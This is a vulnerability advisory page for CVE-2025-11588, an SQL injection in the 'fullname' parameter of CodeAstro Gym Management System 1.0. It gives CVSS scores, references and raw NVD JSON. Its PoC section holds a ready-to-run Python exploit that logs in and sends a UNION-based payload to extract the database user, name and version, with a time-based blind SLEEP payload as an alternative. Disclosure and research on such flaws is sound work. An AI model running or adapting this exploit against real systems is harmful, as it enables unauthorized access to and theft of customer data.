CVE-2025-11588

Description

A vulnerability was identified in CodeAstro Gym Management System 1.0. This impacts an unknown function of the file /customer/index.php. Such manipulation of the argument fullname leads to sql injection. The attack may be performed from remote. The exploit is publicly available and might be used.

CVSS Details

CVSS Score

6.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:codeastro:gym_management_system:1.0:*:*:*:*:*:*:* - VULNERABLE

CodeAstro Gym Management System 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-11588 PoC - CodeAstro Gym Management System SQL Injection # Vulnerability Location: /customer/index.php # Vulnerable Parameter: fullname import requests # Target configuration TARGET_URL = "http://target-site.com" LOGIN_URL = f"{TARGET_URL}/login.php" CUSTOMER_URL = f"{TARGET_URL}/customer/index.php" # Attacker credentials (low privilege account required) USERNAME = "test_user" PASSWORD = "test_password" # Create a session to maintain cookies session = requests.Session() # Step 1: Login to obtain authenticated session login_data = { "username": USERNAME, "password": PASSWORD } response = session.post(LOGIN_URL, data=login_data) print(f"[*] Login response status: {response.status_code}") # Step 2: Craft SQL injection payload for fullname parameter # The payload uses UNION-based injection to extract database information sql_payload = "' UNION SELECT 1,user(),database(),version(),5,6,7,8,9,10-- -" # Step 3: Send the malicious request with injected fullname parameter injection_data = { "fullname": sql_payload, # Add other required form fields here "email": "[email protected]", "address": "test address", "contact": "1234567890" } response = session.post(CUSTOMER_URL, data=injection_data) print(f"[*] Injection response status: {response.status_code}") # Step 4: Check response for extracted data if "root@localhost" in response.text or "information_schema" in response.text: print("[+] SQL Injection successful! Database information extracted.") # Parse and display extracted data else: print("[-] Injection may have failed or data not visible in response.") # Alternative: Time-based blind injection payload # sql_payload = "' OR SLEEP(5)-- -" # response = session.post(CUSTOMER_URL, data={"fullname": sql_payload}) # if response.elapsed.total_seconds() >= 5: # print("[+] Time-based blind SQL injection confirmed!")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-11588
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-11588
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-11588/
[4] VulDB https://vuldb.com/cve/CVE-2025-11588
[5] https://codeastro.com/
[6] https://github.com/coppeliaz/cve/issues/1
[7] https://vuldb.com/?ctiid.327909
[8] https://vuldb.com/?id.327909
[9] https://vuldb.com/?submit.671735

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-11588", "sourceIdentifier": "[email protected]", "published": "2025-10-10T22:15:36.797", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was identified in CodeAstro Gym Management System 1.0. This impacts an unknown function of the file /customer/index.php. Such manipulation of the argument fullname leads to sql injection. The attack may be performed from remote. The exploit is publicly available and might be used."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:codeastro:gym_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "4BDAFA95-39E9-4D93-9228-7D9B51DE6A3F"}]}]}], "references": [{"url": "https://codeastro.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/coppeliaz/cve/issues/1", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.327909", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.327909", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.671735", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}